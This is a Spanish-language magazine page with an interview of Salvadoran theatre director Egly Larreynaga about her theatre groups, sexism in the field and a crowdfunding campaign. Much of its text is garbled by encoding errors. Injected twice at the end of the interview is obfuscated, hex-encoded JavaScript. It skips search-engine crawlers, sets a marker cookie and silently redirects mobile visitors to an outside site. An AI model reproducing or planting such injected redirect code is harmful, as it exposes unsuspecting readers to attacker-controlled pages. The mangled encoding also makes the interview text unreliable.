Entrevistas

30 Mar 2017
Entrevistas | Por: Redacción

ai???El teatro me salvA? la vidaai??? -Egly Larreynaga

Egly Larreynaga, directora y actriz de teatro, nos cuenta cA?mo es desempeAi??arse en las artes escAi??nicas en El Salvador, sus proyectos, motivaciones y sueAi??os. Nos comparte cA?mo es la vida de los artistas y cA?mo es que cada uno de nosotros puede aportar un granito de arena al paAi??s, haciendo lo que le gusta, para lo que naciA?. Para ella, el teatro.

Posiblemente la conozcan por su extensa participaciA?n y direcciA?n en La Cachada Teatro o en el Teatro del Azoro; sin embargo, Egly cuenta con una larga trayectoria internacional en las artes escAi??nicas; por otro lado, ahora a nuestra entrevistada ya no le cuesta decir que es directora de teatro y no solamente una actriz.

A?CA?mo fue que Egly naciA? en el teatro? A?CA?mo despertA? esa vocaciA?n?

EmpecAi?? en teatro a los 19 aAi??os y a raAi??z de ahAi?? intentAi?? buscar formaciA?n. En talleres con la compaAi??Ai??a ai???Sol del RAi??oai???, que era muy emblemA?tica y a partir de ahAi?? ya nunca mA?s pude dejar el teatro. El teatro para mAi?? fue como la forma que encontrAi?? de expresarme, desde que lo conocAi?? me ayudA? mucho, me salvA? la vida.

A?Tuvo algunos obstA?culos para poder ser directora de teatro en El Salvador?

SAi??, bueno, primero en El Salvador, no hay muchas mujeres directoras. Ahora ya hay mA?s. Eso, por un lado, de hecho, una compaAi??era del Teatro del Azoro, decAi??a que le costaba que una mujer la dirigiera y una mujer muy cercana a su edad. Y me lo dijo como compaAi??era y amiga. Por otro lado, la formaciA?n; acA? no existe. Esa que hay para actuar es bastante floja y para direcciA?n no hay, entonces, esa es una limitante. Yo tuve la oportunidad de que migrAi?? y estuve siete aAi??os en EspaAi??a, y busquAi?? formaciA?n en otros lugares por mis propios medios.

A?QuAi?? pasA? por su mente al crear el Teatro del Azoro?

Yo volvAi?? aquAi?? a El Salvador en 2011, a hacer un documental con una cineasta salvadoreAi??a, Marcela Zamora e hice un trabajo con niAi??os por cuatro meses, pero esa experiencia fue muy intensa. Estando en ese proceso, yo tenAi??a unas amigas que hacAi??an teatro, empezamos con pequeAi??as cosas y de pronto eso fue como tomando forma. Yo les dije que querAi??a probar hacer una obra basada en una crA?nica de un periA?dico, El Faro y me dijeron que sAi??, ahAi?? empezamos la aventura. Son mis amigas y cA?mplices, que nos encontramos en una visiA?n del teatro y que le hemos echado ganas todos estos aAi??os. Fue en 2012 que se estrenA? la obra mA?s grande, ai???Los MA?s Solosai???.

A?Y dA?nde entra en panorama La Cachada Teatro?

La Cachada fue justo en la misma fecha que el Teatro del Azoro. Cuando yo vine aquAi?? e hice el documental se me ocurriA? hacer un paralelo con experiencias que tenAi??a y en este caso fue como un experimento. Yo leAi?? un libro que se llama ai???Las mujeres que nadie amA?ai???, que cuenta la historia de ocho mujeres de Mejicanos que hizo CINDE, una organizaciA?n que trabaja en Mejicanos, y entonces me les acerquAi?? y les ofrecAi?? un taller de teatro para mujeres. En un principio, no creAi??an que funcionara porque ellas tendrAi??an que dejar de vender para poder realizar el proyecto.

Usted cree que el teatro relata y hace que lo cotidiano se vuelva extraordinario A?por quAi???

La realidad la vemos muchas veces en la calle, semA?foros, mercado e, incluso, en casa. Y estA? ahAi??, siempre ha estado presente; sin embargo, cuando se han presentado, el impacto que causa en la gente es increAi??ble. Esa cotidianidad deja de serlo y te sorprende. A veces, La Cachada Teatro es un balde de agua frAi??a, pero estA? ahAi??, sA?lo bastaba con bajar la mirada y preguntarle a una mujer.

Yo soy hija de la guerra, pero no estoy de acuerdo en esa lucha. No es mi lucha. Para mAi??, el arte es una herramienta muy poderosa de transformaciA?n social. Va mA?s allA? del entretenimiento, transciende a mA?s y mi arma es el teatro, lo que yo sAi?? hacer. Intentar mejorar esto, aunque no sAi?? si lo lograrAi??, pero lo intento.

Ai??

TIRO AL PLATO

Cultura SalvadoreAi??a: Violenta

El Salvador: Me duele El Salvador

Juventud SalvadoreAi??a: Esperanza

 

Ai??

A?Cree que el machismo le impide realizar su trabajo?

En algunas ocasiones sAi?? lo ha hecho, pero siento aunque falta por caminar en ese terreno, hay una apertura. Recuerdo que invitAi?? a unos de mis colegas a ver un ensayo, y me dijo ai???no me invitAi??s a ver ensayos, invAi??tame a dirigirlosai???; y yo le dije ai???A?PA?chica vos! DAi??jame dirigir un poquito, yo tambiAi??n quieroai???. Por otro lado, nos han criticado que nosotras no queremos trabajar con hombres y no es cierto, trabajamos con hombres que quieran trabajar. Nosotras nos hemos adaptado.

Y en el teatro salvadoreAi??o nos gustarAi??a saber A?a quiAi??nes admiras?

A mis compaAi??eras del Teatro del Azoro. A Alejandra Velazco, una actriz joven que tambiAi??n estA? dirigiendo y ha ganado el Premio RevelaciA?n dos veces. TambiAi??n a TNT, Tiempos Nuevos Teatro, y a su director, Julio Monge; ellos trabajan en Chalatenango y lo que han hecho es maravilloso, son increAi??bles. Julio es bien osado, pero lo logrA? y lo que ha hecho ahAi??, trabajando con los jA?venes es impresionante. Ai??l trabaja en la parte social, tanto asAi?? que nosotras hicimos un proyecto con ellos, trabajan con las cA?rceles, y La Cachada Teatro se presentA? en la cA?rcel de mujeres.

A?QuAi?? cree que los espectadores se llevan con cada una de sus obras?

Creo se van conmovidos. Les hace pensar cosas con casi todas las obras que hemos hecho. En el caso concreto del Teatro del Azoro, nosotras hemos ai???azoradoai??? aquAi?? y en los otros lados a los que hemos ido. Con la Cachada es una bofetada de realidad, pero tambiAi??n es un grito de esperanza, donde se demuestra que se puede cambiar. Que las personas tienen una oportunidad y se ha convertido en arma de empoderamiento para ellas.

A?Han tenido problemas para presentar sus obras acA? en El Salvador?

SAi??, digamos que es un tema delicado. Nos han dado espacio, aunque nos ha costado. Y le ha costado mA?s a La Cachada, incluso el reconocimiento dentro del mismo gremio, porque vienen de donde vienen. De hecho, el gremio de teatro las ha ido a ver bien poco a ellas.

Tienen una campaAi??a de crowdfounding A?de quAi?? trata?

Consiste en un sueAi??o. La idea de esto es que podamos hacer una gira de presentaciones, en comunidades digamos, donde La Cachada se pueda ver no solamente cuando nos contraten. Y lograr hacer nuestra tercera obra, que va a hablar sobre abusos sexuales.

La tercera obra surge a raAi??z de que nos damos cuenta que todas, incluida yo, hemos sufrido abusos sexuales. Y que este paAi??s es el paraAi??so de los abusadores. Surge de una necesidad y queremos hacer de una obra, ya en este caso, que La Cachada de artAi??sticamente otro paso mA?s.

SabAi?? mA?s de la campaAi??a de la Cachada Teatro.

A?QuAi?? les aconsejarAi??a a los jA?venes que quieren involucrarse en el mundo del teatro?

Yo creo que el teatro en sAi?? es maravilloso y les recomiendo que se animen en hacerlo, que aquAi?? hacer teatro es un acto osado, tanto para hombres como para mujeres. Yo animo a que sAi?? se hace, cuesta, pero hay espacios. Y si no los hay, hay que inventarlos.

No hay que esperar las condiciones ideales, si yo me espero, no empiezo a hacer teatro. Yo animo a que busquemos esos espacios, que los exijamos, al Estado, a la SecretarAi??a de Cultura y a las organizaciones. Ha habido un avance, pero aA?n queda mucho por hacer. Esto no lo ha hecho el Estado, ni la sociedad porque no les importa apoyar el arte.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

11 May 2018
Ernesto Otero- Joven  salvadoreño que nos representará ante líderes mundiales en Bruselas
Entrevistas | Por: Mariana Arévalo

Ernesto Otero- Joven salvadoreño que nos representará ante líderes mundiales en Bruselas

7 May 2018
No hay analista político, ni politólogo que sepa tanto de Nuevas Ideas como su servidor– Walter Araujo
Entrevistas | Por: Redacción

No hay analista político, ni politólogo que sepa tanto de Nuevas Ideas como su servidor– Walter Araujo

21 Mar 2018
a�?No hay ningA?n paA�s que se pueda jactar de estar fuera del radar de la corrupciA?na�? – Rodrigo Mora, exSecretario Ejecutivo de la ComisiA?n de Probidad y Transparencia de la Presidencia de Chile
Entrevistas | Por: Redacción

a�?No hay ningA?n paA�s que se pueda jactar de estar fuera del radar de la corrupciA?na�? – Rodrigo Mora, exSecretario Ejecutivo de la ComisiA?n de Probidad y Transparencia de la Presidencia de Chile

13 Mar 2018
a�?Cuando nacA� me dieron seis aA�os de vida, gracias a Dios ya cumplA� los 44 aA�osa�?- Eeileen Romero, candidata electa por San Salvador del PCN
Entrevistas | Por: Redacción

a�?Cuando nacA� me dieron seis aA�os de vida, gracias a Dios ya cumplA� los 44 aA�osa�?- Eeileen Romero, candidata electa por San Salvador del PCN